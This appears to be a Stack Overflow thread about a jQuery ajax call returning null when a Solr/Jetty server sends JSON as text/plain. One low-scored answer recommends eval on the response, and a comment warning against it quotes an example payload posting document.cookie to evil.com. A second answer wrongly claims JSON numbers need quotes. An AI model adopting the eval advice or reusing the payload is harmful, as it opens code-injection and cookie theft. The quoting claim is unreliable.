# Retrieve plain text with jquery ajax and convert to JSON

Tags: jquery, ajax, json

**Update:** the following works fine in IE8, but data comes back null in firefox:

```
$.getJSON('myUrl/solr/select/?q=citystate%3ASea*&version=2.2&start=0&rows=3&indent=on&wt=json&fl=citystate', function(data) {
  alert(data.response.docs[0].citystate);
});
```

I have a jetty server that generates json data as plain text - here are what the headers look like:

```
Last-Modified   Wed, 06 Oct 2010 23:22:27 GMT
Etag    "OTI5YWMzYzFkNDgwMDAwMFNvbHI="
Content-Type    text/plain; charset=utf-8
Content-Length  565
Server  Jetty(6.1.3)
```

Here is an example of the output:

```
{
 "responseHeader":{
  "status":0,
  "QTime":1,
  "params":{
    "fl":"citystate",
    "indent":"on",
    "start":"0",
    "q":"citystate:Sea*",
    "wt":"json",
    "version":"2.2",
    "rows":"10"}},
 "response":{"numFound":233,"start":0,"docs":[
    {
     "citystate":"Seaboard, AL"},
    {
     "citystate":"Seale, AL"},
    {
     "citystate":"Seacliff, AL"},
    {
     "citystate":"Sealy Springs, AL"},
    {
     "citystate":"Searcy, AL"},
    {
     "citystate":"Searight, AL"},
    {
     "citystate":"Searles, AL"},
    {
     "citystate":"Seasha, AL"},
    {
     "citystate":"Searcy, AR"},
    {
     "citystate":"Seaton, AR"}]
 }}
```

I want to retrieve this data using a jquery ajax call like this:

```
$.ajax({
  type: "GET",
  url: "myUrl/?q=citystate%3ASea*&version=2.2&start=0&rows=10&indent=on&wt=json&fl=citystate",
  dataType: "json",
  contentType: "text/plain; charset=utf-8",
  success: function(data, textStatus){
    alert("data: " + data);
  },
  error: function(data){
    alert("error");
  }
});
```

However, the result I get back is always null.  What am I doing wrong?

Answer (score -2):

If you can't get your server to send proper `Content-type` header (ie. **application/json** or **text/javascript**) you should just expect plain text `dataType: 'text'` and evaluate it.

```
function(data){
    eval('var data = ' + data + ';');
    // Rest of your code
}
```

Comment: Please don't use ```eval``` to convert JSON. Use ```JSON.parse```. If that isn't available, you can include json2.js from https://github.com/douglascrockford/JSON-js

Comment: What about `var myfunc = new Function('return ' + data);`? It actually does the same as `eval`, just in a saver way.

Comment: `new Function` is no safer. You're still allowing data you don't control to be run as code in your application. For instance, `data = '($.post("evil.com", document.cookie), alert("where is your god now"), null)'`.

Answer (score -2):

Not sure if it's the root cause of your problem, but I know jQuery is very strict about JSON formatting.  Some of your JSON values aren't enclosed in quotes.  For example:

```
"status":0
```

I'm not at a place where I can easily confirm that in my own environment, so it might be a total red herring.  But it might be worth a quick double-check.